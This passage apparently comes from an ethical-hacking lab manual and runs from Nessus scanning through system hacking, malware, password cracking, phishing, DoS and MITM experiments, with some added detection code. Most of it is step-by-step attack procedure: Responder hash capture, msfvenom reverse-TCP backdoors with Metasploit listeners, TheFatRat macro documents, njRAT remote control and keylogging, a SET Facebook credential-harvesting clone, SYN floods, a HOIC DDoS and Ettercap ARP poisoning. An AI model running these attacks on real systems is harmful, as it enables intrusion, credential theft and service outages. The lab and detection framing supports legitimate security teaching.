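    """Live variant (assumed lab URL): fetch headers like `curl -I` and audit them."""
    import urllib.request
    req = urllib.request.Request(url, method="HEAD")
    with urllib.request.urlopen(req, timeout=5) as resp:
        raw = (f"HTTP/1.1 {resp.status} {resp.reason}\r\n"
               + "".join(f"{k}: {v}\r\n" for k, v in resp.getheaders()) + "\r\n")
    return audit(raw)


if __name__ == "__main__":
    for finding in audit(WEAK_RESPONSE):
        print("-", finding)
    print("hardened response findings:", audit(HARDENED_RESPONSE))
```

The weak response yields eight findings; the hardened one yields none, which is the state you should be able to show after remediation.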
Part (b): Nessus Tool
THEORY REFRESHER:
Nessus is a proprietary vulnerability scanner developed by Tenable, Inc.

Requirements:

● Nessus Essentials
● Windows 10
Procedure:
● To setup your virtual machine:
○ Create a new virtual machine (Machine > New)
○ Name the machine and select your Windows 10 Pro image for the ISO Image prompt.
○ On the Unattended Guest OS Install Setup page: Create an easy to remember
username and password, nothing else on this page needs to be changed. No product
key needed.
○ On the next page, you can leave the default RAM and virtual CPU count, or adjust
them to the specs of your system for better performance.
○ The same applies to the Virtual Hard Disk page. I used 50 GB. Then you're safe to
click Next through the remaining pages until you see the Finish button.
○ Now, right click on your new VM and click settings. Go to the network tab and switch
where it says Attached To: to Bridged Connection and then click Okay.
○ Start up your new VM and let Windows install. Make sure when setting up windows
that you choose not to connect to the internet, it can lead to unnecessary
complications for what we’re trying to do. After starting up, open the RUN (Win + R)
and type [Link].
○ In the firewall settings, you’ll see text that says ‘Turn Windows Firewall On or Off’.
Click this and then you should turn off both the Private and Public firewall settings. (I
realize this is not best practice, but we really just want to get hands on with Nessus)
● To set up Nessus Essentials:
○ Follow the link and register an account. You should receive a ‘key’ and you should
also receive an installer.
○ Install Nessus, it will give you a local URL to access the app (save this URL
somewhere just in case). Then next through the installation steps, ensuring that you
select Nessus Essentials. Wait for it to install and you should be good to go.
● Scanning your Virtual Machine:
○ We turned off the virtual machine's firewall so that Nessus is able to talk to it; with the
firewall on, even a ping to the machine would be unsuccessful. If you know how to open
the proper ports and would like to take the time, you can do that instead of fully turning
off the firewall, but for the sake of brevity, I have chosen to turn it off. I also still ran into
some issues with discovering my virtual machine using ICMP, so I put together a
workaround that I discuss in the steps ahead.
○ Click New Scan in the upper right hand corner and then select Basic Network Scan.
○ Give your scan a name, whatever you please, and then write in the IP address of your
virtual machine. (You can find this by using the command line in your virtual machine
and typing ipconfig. You’re going to want to use the IPv4 address, if you didn’t know
that already…)
○ Now you’re going to want to select the Discovery setting under Basic. Click the
dropdown and select custom, and you’ll see that you’ll receive new options on the left
under Discovery. Select Host Discovery and then turn off Ping the Remote Host. Then
select save, or launch if given the option. (If you select save you’ll have to press the
little play triangle on your saved scan to start a scan)
● The first scan should take a minute, you can select it and view what it finds in real time. You
can click through these and read about the vulnerabilities and how to remediate if you need
to. Notice also that they are color coded and ranked based on severity. It even produces a
nice visualization to give you an idea of how safe / hardened your machine is.
● Now to get an even more detailed scan, we need to reconfigure the scan. Go back to the
main screen, and click the box on the left of our scan. Then select the drop down that says
More in the top right and click Configure. Now we will click the tab next to Settings that says
Credentials. This is how we will perform a credentialed scan, which should give us even
greater results on our next scan.
● Select Windows from the categories on the left, and then under the Authentication method
choose Password. Type in the username of your virtual machine and the password as well.
Click Save, and re-run the scan the same way we did before. (Now you’ll have to leave this
page after hitting scan and hit the play button next to our scan) It should look similar to the
following:

● Now that our credentialed scan is set up, to more easily illustrate the steps of discovery and
remediation, we will install an old, outdated version of Mozilla Firefox on the virtual machine
and watch as Nessus chews you out for this foul indiscretion. Here were the results:
● To get familiar with Nessus, try to read through the Critical > High > Medium vulnerabilities
and follow their guidance to remediate them. To solve the issues it has with Firefox you can
either uninstall it from the VM, or update it so that it's no longer susceptible. In my own
instance, I also disabled Internet Explorer and added a few registry entries using regedit to
remove the WinVerifyTrust Signature vulnerability, but obviously that's not necessary for this
tutorial. It is more to get familiar with Nessus and the Discovery > Remediation workflow.
● After remediation has taken place, run the scan again and you’ll see the number of Critical >
High > Medium vulnerabilities has significantly decreased. Here is a picture after only
removing the outdated Firefox:
EXPERIMENT 4
System Hacking
THEORY REFRESHER:
System hacking is the practice of testing computers and networks for vulnerabilities
and harmful plug-ins. System hacking is itself a vast subject which consists of hacking the
different software-based technological systems such as laptops, desktops, etc. System
hacking is defined as the compromise of computer systems and software to gain access to
the target computer and steal or misuse its sensitive information. Here the malicious
hacker exploits the weaknesses in a computer system or network to gain unauthorized
access to its data or take illegal advantage of it.

Part (a): LLMNR/NBT-NS


THEORY REFRESHER:
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS)
are two components of Microsoft Windows machines. LLMNR was introduced in Windows
Vista and is the successor to NetBIOS. When a DNS name server request fails, Link-Local
Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are used by
Windows machines as a fallback. If the DNS name still remains unresolved, Windows
performs an unauthenticated UDP broadcast to the whole network. Any masquerading
machine, claiming to be the server, then sends a response and captures the target's
credentials during the authentication process.

Objectives:

● Perform LLMNR/NBT-NS spoofing attack.

Requisites:

● Windows 10 virtual machine.


● Kali Linux virtual machine.

Procedure:

● Using Responder
○ Launch and log in to the Windows 10 machine. (Make sure to select a common
password that 'non-tech' people would use, e.g. qwerty).
○ Go to Kali Linux and open the Terminal window.
○ Start Responder to listen to the network interface. (You can type responder -h

to see the options available).

responder -I eth0

○ Now go back to the Windows 10 machine and let's assume that you want to
access a shared network drive connected in your network. Launch run and
type:

\\ceh-tools

● Obtaining and Cracking the Hashes


○ On the Kali machine, Responder captures the authentication attempt from the Windows
10 machine, as shown below:
Go to /usr/share/responder/logs/ and open the last file created by Responder:

● SMB-NTLMv2-SSP-[Link].txt

○ These are the hashes of the logged-in user collected by Responder. Now let's
crack these hashes.
○ To crack the passwords we will use John the Ripper.
○ Open a new Terminal window and type john followed by the path to the Responder
log file (note that the file name may differ in your lab environment):

john /usr/share/responder/logs/SMB-NTLMv2-SSP-[Link].txt

The cracked password hashes of the Dummy user are shown in the output above.
Part (b): Cracking SAM hashes to Extract Plain Text passwords
THEORY REFRESHER:
SAM (Security Account Manager) is a database file present in Windows machines
that stores user accounts and security descriptors for users on a local computer. It stores
users' passwords in hashed form (as LM and NTLM hashes). Because a hash
function is one-way, this provides some measure of security for the storage of the
passwords.

Objectives:
● Use the pwdump7 tool to extract password hashes.
● Use the Ophcrack tool to crack the passwords and obtain plain text passwords.

Requisites:

● Windows 10 machine.

Procedure:

● Generate Hashes
● Before anything, we need to find the User IDs (SIDs) associated with the usernames on
Windows 10.
● Launch the Command Prompt in Administrator mode and type:

wmic useraccount get name,sid > c:/[Link]

● This command gives us the usernames and their respective User IDs. Make a note of
each User ID for the further steps.
● To gather the Password hashes, go to the pwdump7 folder and execute the .exe file.

cd C:\Users\Dummy\Desktop\pwdump7

[Link]

● To save this output to an external .txt file, type:

[Link] > c:\[Link]

● Now place the usernames before their respective User IDs that we gathered in
step 2 and save the file.
● Using Ophcrack to crack the hashes
○ Launch the Ophcrack application.
○ Click on Load and select PWDUMP file.

○ Next, you will need to download tables to perform the cracking. Select the
Vista free to download.
○ Go to the Ophcrack and click the Tables menu to load the Table.
○ On the Table Selection window, select the Vista free, and click Ok.
○ This table_vista_free is a pre-computed table for reversing cryptographic hash
functions and recovering plaintext passwords up to a certain length. The
selected table_vista_free is installed under the name Vista free, which is
represented by a green colored bullet.
○ Click Crack on the menu bar. Ophcrack begins to crack passwords. This action
will take a few minutes.

Part (c): Escalating Privileges


THEORY REFRESHER:
Privilege escalation is the act of exploiting a bug, configuration flaw, or design
oversight in an operating system or software application to gain elevated access to
resources that are normally protected from an application or user.

Objectives
● Demonstrate how to escalate privileges on a victim machine by exploiting its
vulnerabilities.

Requisites:
● Kali Linux virtual machine.
● Windows 10 virtual machine.

Procedure:
● Create a Backdoor
○ To create the malicious executable file, type this command and put your Kali IP
address in the LHOST option:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[Link] -f exe > Desktop/[Link]

○ This command creates the Windows executable file named [Link] and
saves it on the Kali desktop.

● Share the [Link] file
○ First off, we need to set up the Apache configuration and the shared folder.

Apache configuration

If you don't have apache2 installed, run apt-get install apache2.

● Navigate to the apache2 folder and open the [Link] configuration file:
vim /etc/apache2/[Link]
● Add a new line with the directive servername localhost and save the file.

● Create a new directory inside the html folder:
mkdir /var/www/html/share/
● Change the mode of the share to 755:
chmod -R 755 /var/www/html/share/
● Change the ownership of that folder to www-data:
chown -R www-data:www-data /var/www/html/share/
● To check the permissions and ownership of the share directory, type:
ls -la /var/www/html/ | grep share

drwxr-xr-x 2 www-data www-data 4096 Dec 18 20:52 share


● Now copy the malicious file to the shared location:
cp /root/Desktop/[Link] /var/www/html/share/
● Start the apache service to run the http server:
service apache2 start
● Perform Exploitation
○ Start the Metasploit Framework by typing:

msfconsole

○ Select the multi/handler and set the payload to meterpreter/reverse_tcp:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

○ Set the LHOST to the Kali IP address:

set LHOST [Link]

○ Start the exploit in the background:

exploit -j -z

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on [Link]:4444
● Run Exploit
○ Switch to the Windows 10 machine, launch the browser and type the URL:
[Link] (change to the IP address of your Kali).
○ Click [Link] to download the backdoor file. Once the file is downloaded, navigate
to the download location and open the file to execute it.
○ If an Open File - Security Warning window appears, click Run.
○ Switch back to the Kali machine. A Meterpreter session has been successfully
opened, as shown below:

[*] Sending stage (180291 bytes) to [Link]
[*] Meterpreter session 1 opened ([Link]:4444 -> [Link]:49804) at 2019-12-18 [Link] -0500

○ To interact with the available sessions, you can use the command sessions or
sessions -i to list the currently open sessions. To open any session, select its ID by
issuing the command:

sessions <ID>

● Open the current Meterpreter session and type:


● Establish a Session
Part (d): Hacking Windows with Malicious Office Document
using TheFatRat
THEORY REFRESHER:
TheFatRat is an exploitation tool which compiles malware with a well-known
payload; the compiled malware can then be executed on Linux, Windows, Mac
and Android. TheFatRat provides an easy way to create backdoors and payloads
which can bypass most anti-virus products.

Objectives:
● Use an Office document to exploit a Windows machine.

Requisites:

● Windows Server 2016/2012 virtual machine.


● Kali Linux virtual machine.

Procedure:

● Set up TheFatRat
○ Go to your Kali machine and open the Terminal.
○ Navigate to the /opt/ folder.
cd /opt
○ Clone the original github repository from FatRat:
git clone [Link]
○ Change the folder permissions:
chmod -R 755 /opt/TheFatRat/
○ Go to the TheFatRat folder:
cd TheFatRat/
○ Execute the bash file ([Link]) to begin the installation:
./[Link]
○ An "Updating Kali Repo" xterm window will pop up as shown below:
● Make a Backdoor File
○ After the installation is complete, in the Terminal, type fatrat and hit enter.
○ When FatRat launches, it starts to verify the installed dependencies; you will get
multiple prompts, just press Enter to continue.
○ On the FatRat menu, choose [06] Create Fud Backdoor 1000% with
PwnWindws [Excelent] by typing 6.

○ PwnWinds menu appears as shown above, choose the [3] Create exe file with
apache + Powershell (FUD 100%) by typing 3 in the menu.
○ Set the LHOST IP to your Kali IP; LPORT to 4444 and the output to payload
as shown above.
○ Next, choose [3] windows/meterpreter/reverse_tcp by typing 3.

○ If everything works, fatrat will generate a [Link] file located in
/root/Fatrat_Generated/ as shown below:

Backdoor Saved To : /root/Fatrat_Generated/[Link]

● Make a Malicious Word File


○ Go back to the main menu by choosing [9] Back to menu.
○ On the main menu, choose the [07] Create Backdoor For Office with
Microsploit

○ On the Microsploit menu, choose [2] The Microsoft Office Macro on Windows by
typing 2.
● The next configurations will be:
○ LHOST IP: [Your Kali IP]
○ LPORT: 4444
○ Enter the base name for output files: EvilDoc
○ Enter the message for the document body: you have been PWNED :)
○ The next prompt will ask if you want to use a custom exe file as the backdoor.
Choose y for yes.
○ Specify the exact path to the [Link] that you generated at the
beginning of this lab: /root/Fatrat_Generated/[Link]
○ On the Payload Option, choose the [3] windows/meterpreter/reverse_tcp by
typing 3. Navigate to the output folder of FatRat to see the generated Word
file.
● Set Up a Listener
○ Open another Terminal window and launch metasploit by typing: msfconsole.
○ Select the multi/handler:
use multi/handler
○ Set the payload to meterpreter/reverse_tcp:
set payload windows/meterpreter/reverse_tcp
○ Set the LHOST to your Kali IP and LPORT to 4444:
set LHOST [Link]
set LPORT 4444
○ Type run to start the listener:
run
● Share the Malicious Doc File
○ To share the malicious file to Windows machine, copy the Doc file to the
apache folder. Open a new Terminal window and type:
cp /root/Fatrat_Generated/[Link] /var/www/html/share/
○ Then, start the apache service:
service apache2 start
● Open the Malicious Doc
○ Switch to your Windows machine and open the browser.
○ Type the URL (based on your Kali IP):
[Link]
○ Then download the malicious doc that you generated.
○ Open the Downloads folder and click the MS Word file.
○ MS Word opens the file in Protected View. Click Enable Editing as shown
below:

○ If you got the SECURITY WARNING because of the Macros, click on Enable
Content.
○ Now Switch back to the Kali, if everything works, you will find a Meterpreter
session open in the Metasploit terminal.

○ Now you can view the exploited system details and so on. Informally you can
call this action 'profit' :)
EXPERIMENT 5
Malware Threats
THEORY REFRESHER:
Malware (malicious software) is a type of program that contains malicious or harmful
code embedded in apparently harmless programming or data in such a way that it can take
control of a system or its operations and cause damage, such as ruining the file allocation
table on a hard [Link] poses a major security threat to information security.
Malware writers explore new attack vectors to exploit vulnerabilities in information systems.

Part (a): njRAT - Remote Access Trojan


THEORY REFRESHER:
njRAT is a RAT with powerful data-stealing capabilities. In addition to logging
keystrokes, it is capable of accessing a victim's camera, stealing credentials stored in
browsers, uploading and downloading files, performing process and file manipulations,
and viewing the victim's desktop.

Requirements:
● Windows 10 (Attacker).
● Windows 7, 8 or Server (Target).

Objectives
● Create a server using njRAT.
● Access the target machine remotely.

Procedure:
● Create an Executable Server with njRAT
○ Log in to Windows 10 and install the njRAT.
○ Launch the njRAT, the GUI appears along with a pop-up, where you need to specify
the port you want to use to interact with the target machine. Use the default port
number 5552, and click Start.

○ Click on Builder at the lower-left corner.

○ On the Builder dialog box, enter the IP address of the attacker machine
(Windows 10), check the options Copy to StartUp and Registry StartUp, then click
Build as shown below:
○ Save the file on the Desktop and name it [Link].
○ Now, we need to use any technique to send this server to the intended target,
through mail or any other way.
○ To make this easier in this lab, I copied the [Link] file to the shared
network location.
● Execute the Server on the Target Machine
○ In this lab I'm using a Windows 7 SP1 virtual machine.
○ Drag the [Link] file to your Desktop and double-click it.

○ As you can see below, the connection was successfully established.

○ Switch back to Windows 10 (Attacker). When the target double-clicks the
server, the executable starts running and the njRAT GUI running on the
Windows 10 machine establishes a persistent connection with the target machine as
shown below:

○ The GUI displays the machine's basic details such as the IP address, OS,
username and so on.
● Manipulate Files on Target machine
○ Right-click on the detected Target machine and click Manager.
○ Double-click on any directory in the left pane. You can right-click any selected
directory and manipulate it using the contextual options:

● Manage the Processes


○ Click on Process Manager on the top menu. You will be redirected to the
Process Manager, where you can right-click any process and perform actions
such as Kill, Delete, and Restart.
● Manage the Connections
○ Click on Connections on the top menu and select a specific connection,
right-click on it, and click Kill Connection. This action kills the connection
between two machines communicating through a particular port.

● Manage the Registries


○ Click on Registry on the top menu and choose a registry from the left pane,
right-click on its associated registry files, and a few options appear to
manipulate them.

● Launch a Remote Shell


○ Click on Remote Shell on the top menu. This action launches a remote
command prompt of the target machine.
○ Similarly, you can issue all the other commands that can be executed in the
command prompt of the target.
● Run File
○ On the main window of njRAT, right-click on the Target machine and select
Run File. An attacker makes use of these options to execute scripts or files
remotely from his/her machine.

● Launch a Remote Desktop Connection


○ Right-click on the Target machine and select Remote Desktop Connection

○ This launches a remote desktop connection without the target's consent. You
will be able to remotely interact with the victim machine using the mouse or
keyboard.
○ In the same way, you can select the Remote Cam and Microphone to spy on
the target and track voice conversations.
● Perform Key Logging
○ Switch to the Windows 7 (Target machine). Let's assume that you are a
legitimate user and perform a few activities such as logging into any websites
or typing text in some documents.
○ Now, switch back to Windows 10 machine / njRAT GUI and right-click on the
target machine, select the Keylogger option.
○ The keylogger window appears, displaying all the keystrokes performed by the target.
Part (b): HTTP RAT Trojan
THEORY REFRESHER:
HTTP/HTTPS Trojans can bypass any firewall, and work as kind of a straight HTTP
tunnel, but one that works in reverse. They use web-based interfaces and port 80 to gain
access. The execution of these trojans takes place on the internal host and spawns a "child"
at a predetermined time. The child program appears to be a user to the firewall so it allows
the program access to the internet. However, this child executes a local shell, connects to
the web server that the attacker owns on the internet through a legitimate-looking HTTP
request, and sends it a ready signal. The legitimate-looking answer from the attacker's web
server is in reality a series of commands that the child can execute on the machine's local
shell.

Objectives:

● Create a server and Run HTTP Trojan on Windows Server 2012.


● Execute the Server from Windows 10 virtual machine.
● Control Windows 10 machine remotely from Windows Server 2012.

Requisites:

● Windows Server 2012 virtual machine (Attacker).


● Windows 10 virtual machine (Target).

Procedure:

● Create a Trojan on Windows Server

○ Log on to Windows Server 2012 and install the HTTP RAT TROJAN tool:
[Link]
○ Double-click [Link], the HTTP RAT main window appears as shown
below:
○ Uncheck the "send notification with IP address to mail" option, set the server port
to 84 and click Create.
○ Once the [Link] file is created, a pop-up will be displayed; click OK
and share the file with the Windows 10 virtual machine.
○ The file will be saved into the HTTP RAT TROJAN folder as shown below:

● Execute the Trojan on Windows 10


○ Now log into Windows 10 and navigate to the place where you saved the
[Link] file. Double click to run the Trojan.
○ You will be able to see the Http Server process in the task manager:

● Analyze the Target Machine

○ Switch back to Windows Server 2012 and launch the web browser.
○ Enter the IP address of Windows 10 in the address bar to access the machine.
○ If everything works, you should get this window:

○ Click on the Running processes link to list the processes running on
Windows 10. It is possible to kill any process from here.
○ Click browse and then click Drive C to explore the contents in this drive.

○ Click computer info to view information of the computer, users and hardware.

○ After you are done, end the [Link] process in Windows 10.
EXPERIMENT 6
Password Cracking and Hash Analysis

Part (a): Hash Identification


COMPONENTS/Tools:
● Kali Linux virtual machine.

PROCEDURE:
● In order to identify the hash algorithm used for each of the given hashes, we used hashid,
which is a tool built for exactly this job.
● We used the option -j, which shows the format code that JTR needs in order to run on these
hashes in the next part.
● This tool cannot pinpoint the exact algorithm used for the hash; instead it
suggests a list of algorithms that could produce a hash like the given one.
● For the first hash the most likely candidate is some version of the Message Digest (MD) algorithm.

● Similar to the first one, the second hash seems to be an MD hash as well.
● Judging by the different size of the hash it is clear that a different algorithm than the first two
is used; hashid suggests SHA-1 among other hash types.

Part (b): Hash Cracking


COMPONENTS/Tools:
● Kali Linux virtual machine.

PROCEDURE:
● For cracking the above hashes I will use the software called John the Ripper (john, aka JTR).
JTR will do a dictionary attack for each hash, which will only work if the given format is indeed
the hash algorithm used to create these hashes.
● We decided not to provide JTR with a wordlist (dictionary) like [Link] as it can use its
default one (which seems to get the job done).
● First up, trying to crack the first password the MD5 format didn’t return any results. That
either means that the password is not in the dictionary that JTR used to attack, or that the
given format does not match the actual algorithm used.
● Here we can observe that when we run JTR again with MD4 as format, we get a result. With
this we conclude that the first password is “awesome”
● For the last two hashes the process was pretty much the same as I got a hit with the first try.
As it turns out, the password for the second hash is “Princess” and for the third hash it was
“confused”.

● We can verify our findings by running a tool like [Link] which has a pre-computed
hash lookup table for commonly used passwords
EXPERIMENT 7
Social Engineering Attacks
Objectives:

● Clone a website
● Obtain username and password
● Generate reports for conducted pentesting

Requisites:

● Kali Linux virtual machine


● Any Windows virtual machine

Procedure:

Launch SET

Log in to Kali Linux. Remember that every Kali version comes with SET pre-installed;
to launch it (on Kali 2019.4) go to Kali Menu > 13 - Social Engineering Tools > SET
(Social Engineering Toolkit).

Accept the Terms of Services by typing y.

Clone a Website
On the SET Main menu, select the first option 1) Social-Engineering Attacks by typing
the number:

Select from the menu:

Next, choose 2) Website Attack Vectors:

Select from the menu:

The Web Attack Vector is a unique way of utilizing multiple web-based attacks in order
to compromise the intended target.

In the next menu, select 3) Credential Harvester Attack Method.

The Credential Harvester Method will utilize web cloning of a website that has a login
input (username and password fields) and harvest all the information posted to the website.

Next, select the 2) Site Cloner:

The site cloner is used to clone a website of your choice.

Next, type the IP address of Kali Linux and the URL to be cloned, on this example we will
use [Link] as shown below:

After that, leave this terminal tab running.

Send a Crafted Email

Now you must send the IP address of your Kali machine to a target and trick them into
clicking it.

For this demo, we will use Gmail; Launch the web browser on your Kali and login
to a Gmail account to compose an email.

This example will demonstrate just the technical aspect of this technique.
To create a proper link, click edit link and first type the actual address under Link
to, and then type the fake URL in the Text to display field.

You can verify the fake URL by clicking one time, it will display the actual URL.
Log in to the Cloned Website

Log in to Windows as the victim, launch the web browser and sign in to your email
(the account that you sent the phishing email to).

When the victim clicks the URL, they will be presented with a replica of
[Link]. The victim will be prompted to enter their username and password into
the form fields. After the victim enters the username and password and clicks Log In,
the clone does not log them in; instead, it redirects to the legitimate Facebook login page
(observe the URL).

Obtain the Credentials

The SET on Kali Linux fetches the typed username and password, which
can be used by the attacker to gain unauthorized access to the victim's account.
EXPERIMENT 8
Denial of Service (DoS) Attack Simulation
(a) SYN Flooding

Requisites

● Kali Linux virtual machine


● Windows 10 virtual machine (w/ Firewall off)
● Windows Server 2012 or 2016 virtual machine

Procedure:

Test for Open Port

Log into the Kali Linux and open a new terminal window.

We are going to perform SYN flooding on Windows 10 through some open port. To
check which ports are open, we will use Nmap to scan all ports:
nmap -p- <Windows 10 IP address>

In this lab, we will use an auxiliary module from Metasploit named synflood to
perform DoS attack on the target using port 445.

(b) Perform DoS attack

● Type msfconsole to launch Metasploit Framework.

msfconsole

● Type the command to load the module:

use auxiliary/dos/tcp/synflood

● To display all the options of the module, type:

options
● We will change the RHOST, RPORT and SHOST parameters:

set RHOST [IP address of Windows 10]
set RPORT 445
set SHOST [IP address of Windows Server]

● By setting the SHOST option to the IP address of Windows Server, you are
spoofing the source address: the flood appears to come from the Windows Server
rather than from the Kali Linux machine.
● Once the auxiliary module is configured, start the DoS attack on Windows
10 by typing:

run

● This begins the SYN flooding on Windows 10.


Examine the DoS Attack

● Switch to the Windows 10 machine and launch the Wireshark, select the correct
interface and click start.
● Wireshark displays the traffic coming from the machine as shown below:

● Here, you can observe that the source IP address is from Windows Server. This
implies that the IP Address of Kali Linux has been spoofed.
● Next, open the Task Manager on Windows 10 and click the performance tab.
● You will observe that the CPU and Ethernet usage has increased drastically after the
attack, which implies that the DoS attack is in progress. If the attack is continued
for some time, the machine's resources would be completely exhausted, and it will
stop responding.

Perform SYN flooding using hping3

hping3 -S [Windows 10 IP address] -a [Kali IP address] -p 22 --flood

● This initiates the SYN flooding on Windows 10.
● hping3 floods the victim machine by sending bulk SYN packets and overloading the
victim's resources.
● Switch to the Windows 10 and launch the Wireshark, select the correct
interface and start capturing.
● Analyze the traffic captured, you will notice the huge number of SYN packets,
which can cause the target machine to crash.
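What the Wireshark analysis above looks like when automated, as an added example that is not part of the manual: detection logic run over constructed capture lines (time, source MAC, source IP, destination IP, destination port, TCP flags) that flags a half-open SYN flood and a source IP whose frames carry the wrong MAC, which is how the SHOST / -a spoofing shows up on the wire. Addresses and MACs are constructed for this example.

```python
from collections import defaultdict

# Constructed lab addresses (not the manual's): Windows 10 target, the Windows
# Server whose IP is spoofed via SHOST / hping3 -a, and the Kali machine that
# actually transmits the frames.
WIN10, WINSRV, KALI = "10.10.10.10", "10.10.10.20", "10.10.10.30"
KNOWN_MACS = {
    WIN10: "00:0c:29:aa:aa:aa",
    WINSRV: "00:0c:29:bb:bb:bb",
    KALI: "00:0c:29:cc:cc:cc",
}


def build_sample_capture():
    """Constructed capture lines 'time src_mac src_ip dst_ip dport flags', like
    columns exported from Wireshark. Three genuine handshakes from the server,
    then 500 SYN-only segments to port 445 carrying the server's IP but the
    Kali NIC's MAC: spoofing the IP does not change the Ethernet source."""
    lines = []
    t = 0.0
    for i in range(3):
        lines.append(f"{t:.4f} {KNOWN_MACS[WINSRV]} {WINSRV} {WIN10} 445 S")
        lines.append(f"{t + 0.001:.4f} {KNOWN_MACS[WIN10]} {WIN10} {WINSRV} 5000{i} SA")
        lines.append(f"{t + 0.002:.4f} {KNOWN_MACS[WINSRV]} {WINSRV} {WIN10} 445 A")
        t += 1.0
    for i in range(500):
        lines.append(f"{t + i * 0.0002:.4f} {KNOWN_MACS[KALI]} {WINSRV} {WIN10} 445 S")
    return lines


def detect_syn_flood(lines, window_s=1.0, syn_threshold=100, max_completion=0.1):
    """Return alerts for the two things the lab observes in Wireshark: a source
    that opens syn_threshold or more connections to one port inside window_s
    seconds while completing at most max_completion of them with an ACK
    (half-open flood), and a source IP seen with a MAC other than its known
    one (spoofed source)."""
    syn_times = defaultdict(list)  # (src_ip, dst_ip, dport) -> SYN timestamps
    ack_count = defaultdict(int)   # same key -> bare ACKs = completed handshakes
    alerts, spoof_seen = [], set()
    for line in lines:
        ts, mac, src, dst, dport, flags = line.split()
        key = (src, dst, dport)
        if flags == "S":
            syn_times[key].append(float(ts))
        elif flags == "A":
            ack_count[key] += 1
        expected = KNOWN_MACS.get(src)
        if expected and mac != expected and (src, mac) not in spoof_seen:
            spoof_seen.add((src, mac))
            alerts.append(("spoofed_source", src, mac, expected))
    for key, times in syn_times.items():
        times.sort()
        peak, j = 0, 0  # most SYNs inside any window_s-second interval
        for i, t in enumerate(times):
            while times[j] < t - window_s:
                j += 1
            peak = max(peak, i - j + 1)
        completion = ack_count[key] / len(times)
        if peak >= syn_threshold and completion <= max_completion:
            alerts.append(("syn_flood", key[0], key[1], key[2], peak))
    return alerts


if __name__ == "__main__":
    for alert in detect_syn_flood(build_sample_capture()):
        print(alert)
```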

DDoS attack using HOIC

Requisites

● Kali Linux virtual machine (Target)


● Windows Server, Windows 10 and Windows 7 virtual machine (Attackers)

Overview of HOIC
High Orbit Ion Cannon (HOIC) is a free, open-source network stress application
developed by Anonymous, a hacktivist collective, to replace the Low Orbit Ion Cannon
(LOIC). Used for denial of service (DoS) and distributed denial of service (DDoS) attacks, it
functions by flooding target systems with junk HTTP GET and POST requests.
Log in to Virtual Machines
● Before beginning this lab, turn on and log in to all virtual machines on this lab
(Windows 7, 10, Server and Kali Linux).
● Copy the High Orbit Ion Cannon (HOIC) folder onto all three Windows virtual
machines.

Configure HOIC
● Switch to Windows 10 and open HOIC ([Link]).
● On the HOIC GUI, click '+' to add the target.

● On the HOIC - [Target] pop-up:


● Type the target URL (IP address of your Kali)
● Slide the power bar to High
● Select [Link] booster from the drop-down list
● Click add

● Set the THREADS value to 20 as shown below:

Now repeat this process on every Windows virtual machine in your lab.

Perform DDoS Attack


● Once HOIC is configured on all machines, switch to each machine and click
FIRE TEH LAZER!.

● This initiates the DDoS attack on the target (Kali Linux).


● Switch to the Kali Linux and launch the Wireshark.
● Observe that Wireshark starts capturing a very large volume of packets, which
means the machine is experiencing a huge number of incoming packets.
These packets are coming from the Windows 7, Windows Server and
Windows 10 virtual machines.

● In this lab, only three machines are demonstrated flooding a single machine. If
there are a large number of machines performing the flooding, then the target Kali
Linux resources are completely consumed and the machine is overwhelmed.
● In the real world, a group of attackers operating hundreds or thousands of machines
configure this tool on their machines and launch the DDoS attack by
flooding a target machine/website at the same time. The target is
overwhelmed and stops responding to user requests or starts dropping
packets coming from legitimate users. The larger the number of attacker
machines, the higher the impact of the attack on the target machine/website.
● To stop the DDoS, click FIRE THE LAZER! again, and then close the HOIC
window in all the attacker virtual machines.

Detecting DoS Attack traffic

KFSensor is a Windows-based honeypot IDS. It acts as a honeypot to attract and
detect hackers and worms by simulating vulnerable system services and Trojans. By acting
as a decoy server, it can divert attacks from critical systems and provides a higher level of
information than firewalls and NIDS alone.
KFSensor Free Trial: [Link]
Requisites
● Windows 10 virtual machine
● Windows Server 2012 or 2016 virtual machine
● Kali Linux virtual machine

Setting up
● Install KFSensor and Wireshark on the Windows 10 virtual machine.
● Launch KFSensor as Administrator.
● Click on Settings on the top menu and then Set Up Wizard.
Leave the options at their defaults until you reach the DoS options.
● Select Cautious from the Denial of Service Options drop-down list, and select Enable packet
dump files from the Network Protocol Analyzer drop-down list:

● Click Next and finish the wizard:

● On the left panel you will see that the FTP icon is green and the FTP section is empty; this means
there is currently no traffic through port 21.
● Now KFSensor is configured to detect DoS attacks.
Detecting DoS Attack
Switch to the Windows 10, you should now be able to access it.
Now the FTP icon in the left pane changes to red, and the FTP section in the right pane is
flooded with events.

Scroll down and try to find an event named DOS Attack

This concludes that KFSensor has detected the DoS attack.


EXPERIMENT 9

Man-in-the-Middle (MITM) Attack Exploration

COMPONENTS/Tools:
● Attacker Machine (kali)
● Victim Machine (windows/linux)

PROCEDURE

Step 1: Install Ettercap if you don't have it installed. In a Linux distribution, you can
install it by running:

sudo apt-get install ettercap-graphical

Step 2: Start Ettercap in graphical mode using sudo, as root privileges are required to
perform sniffing:

sudo ettercap -G
Step 3: In the Ettercap GUI, select "Sniff" from the menu, then "Unified Sniffing...",
and choose your network interface.
Step 4: Next, you need to scan for hosts available on your network. Select "Hosts" >
"Host List" > "Binary" > "Load hosts from file". You might need to scan the hosts
before doing this. The host list should then populate with available targets.
Step 5: Now, choose the victims. An MITM attack requires two victims: source and
target. In the "Host List" window, select two hosts. Use the "Add to Target 1" option to
choose the hosts.
Step 6: Start your attack now by selecting "MITM" from the menu and then choosing
"ARP poisoning". Tick the "Sniff remote connections" box and hit "OK".
Step 7: Now you need to start the actual sniffing process. Go to “Start” > “Start
Sniffing”.
Step 8: This step involves viewing the user activities. Go to the "log" option from the
toolbar, and choose "View user log".
At this point, you will be able to monitor the network traffic between your two selected
targets as they pass through your mach
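The same attack seen from the victim's side, as an added example that is not part of the manual: the logic an ARP monitor uses to spot the poisoning started in Step 6, namely an IP whose advertised MAC changes and one MAC answering for more than one IP. Addresses and the ARP reply log are constructed for this example.

```python
from collections import defaultdict

# Constructed addresses for the example (not the lab's real ones).
GATEWAY, VICTIM = "192.168.1.1", "192.168.1.20"
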